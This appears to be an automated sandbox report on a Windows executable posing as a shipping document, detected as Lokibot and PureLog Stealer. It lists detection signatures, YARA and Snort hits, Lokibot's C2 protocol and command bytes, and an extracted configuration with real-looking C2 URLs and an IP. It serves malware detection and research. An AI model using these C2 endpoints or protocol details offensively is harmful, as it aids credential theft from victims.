Edit tour

Windows Analysis Report
Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Overview

General Information

Sample name:	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Analysis ID:	1431478
MD5:	34730f3da822589c3b36ec7197ede429
SHA1:	666691e4d03bb9d885184e80d5ec5639ef56a886
SHA256:	deb91032be610ab0761ed5e1076877458b9adbbbf79ae250672fc1c2f5fc8d0a
Tags:	exeLoki
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe (PID: 5516 cmdline: "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe" MD5: 34730F3DA822589C3B36EC7197EDE429)

Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe (PID: 3196 cmdline: "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe" MD5: 34730F3DA822589C3B36EC7197EDE429)

Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe" MD5: 34730F3DA822589C3B36EC7197EDE429)

WerFault.exe (PID: 7208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=ee"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18000:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53cb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13c0f:$des3: 68 03 66 00 00 0x18000:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x180cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x309e4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1dd97:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2c5db:$des3: 68 03 66 00 00 0x309e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x30ab0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x193fe0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1813ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x18fbef:$des3: 68 03 66 00 00 0x193fe0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1940ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x59f3b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x66244:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x71013:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x9158:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 41 entries

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:03.512691
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:19.955290
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:16.290446
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:07.780738
SID:	2024313
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:19.955290
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:03.512691
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

